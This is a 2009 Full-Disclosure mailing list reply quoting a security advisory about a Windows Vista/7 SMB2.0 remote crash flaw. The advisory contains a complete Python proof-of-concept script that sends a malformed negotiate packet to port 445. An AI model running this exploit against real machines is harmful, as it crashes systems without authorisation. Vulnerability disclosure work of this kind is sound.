So Msoft! why can't they just stop reintroducing bugs? On Wed, Sep 9, 2009 at 11:04 AM, <[email protected]> wrote:
> -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > How come all I hear about is n3td3v, and I see noone crying out > lout about this : > http://www.reversemode.com/index.php?option=com_mamblog&Itemid=15&ta > sk=show&action=view&id=64&Itemid=15<http://www.reversemode.com/index.php?option=com_mamblog&Itemid=15&ta%0Ask=show&action=view&id=64&Itemid=15> > > is fd all 'bout trolls nao? > > - -- > ============================================= > - - Release date: September 7th, 2009 > - - Discovered by: Laurent GaffiƩ > - - Severity: Medium/High > ============================================= > > I. VULNERABILITY > - ------------------------- > Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D. > > II. BACKGROUND > - ------------------------- > Windows vista and newer Windows comes with a new SMB version named > SMB2. > See: > http://en.wikipedia.org/wiki/Windows_Vista_networking_technologies#S > erver_Message_Block_2.0 > for more details. > > III. DESCRIPTION > - ------------------------- > SRV2.SYS fails to handle malformed SMB headers for the NEGOTIATE > PROTOCOL REQUEST functionnality. > The NEGOTIATE PROTOCOL REQUEST is the first SMB query a client send > to a SMB server, and it's used > to identify the SMB dialect that will be used for futher > communication. > > IV. PROOF OF CONCEPT > - ------------------------- > > Smb-Bsod.py: > > #!/usr/bin/python > # When SMB2.0 recieve a "&" char in the "Process Id High" SMB > header field it dies with a > # PAGE_FAULT_IN_NONPAGED_AREA > > from socket import socket > from time import sleep > > host = "IP_ADDR", 445 > buff = ( > "\x00\x00\x00\x90" # Begin SMB header: Session message > "\xff\x53\x4d\x42" # Server Component: SMB > "\x72\x00\x00\x00" # Negociate Protocol > "\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853 > "\x00\x26"# Process ID High: --> :) normal value should be > "\x00\x00" > "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe" > "\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54" > "\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31" > "\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00" > "\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57" > "\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61" > "\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c" > "\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c" > "\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e" > "\x30\x30\x32\x00" > ) > s = socket() > s.connect(host) > s.send(buff) > s.close() > > V. BUSINESS IMPACT > - ------------------------- > An attacker can remotly crash without no user interaction, any > Vista/Windows 7 machine with SMB enable. > Windows Xp, 2k, are NOT affected as they dont have this driver. > > VI. SYSTEMS AFFECTED > - ------------------------- > Windows Vista/7 All (64b/32b|SP1/SP2 fully updated) and possibly > Win Server 2008 > as it use the same SMB2.0 driver (not tested). > > VII. SOLUTION > - ------------------------- > Vendor contacted, but no patch available for the moment. > Close SMB feature and ports, until a patch is provided. > > VIII. REFERENCES > - ------------------------- > http://microsoft.com > > IX. CREDITS > - ------------------------- > This vulnerability has been discovered by Laurent GaffiƩ > Laurent.gaffie{remove-this}(at)gmail.com > http://g-laurent.blogspot.com/ > > X. LEGAL NOTICES > - ------------------------- > The information contained within this advisory is supplied "as-is" > with no warranties or guarantees of fitness of use or otherwise. > I accept no responsibility for any damage caused by the use or > misuse of this information. > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -----BEGIN PGP SIGNATURE----- > Charset: UTF8 > Note: This signature can be verified at https://www.hushtools.com/verify > Version: Hush 3.0 > > wpwEAQMCAAYFAkqnw/YACgkQRVBSp0SbIgeyMQQAoyMwFvi4CWq+2XUcoyIQUp/MxwBr > mUbXX+BJYl6K9ydQqZDxnAwOi24VIBE/xRQcUFMhVH/Uk4zH9KAGzW7/gu3V8Yq0mHPL > pCZ9+Lwml3mNeJOg6oZEyJUhmJTF2WcfXLnmjHbys0oShACWCXBAyqyMVQFdNSja9aeC > 6kWcu5Q= > =MjSD > -----END PGP SIGNATURE----- > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ -- http://www.jewelerslounge.com
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
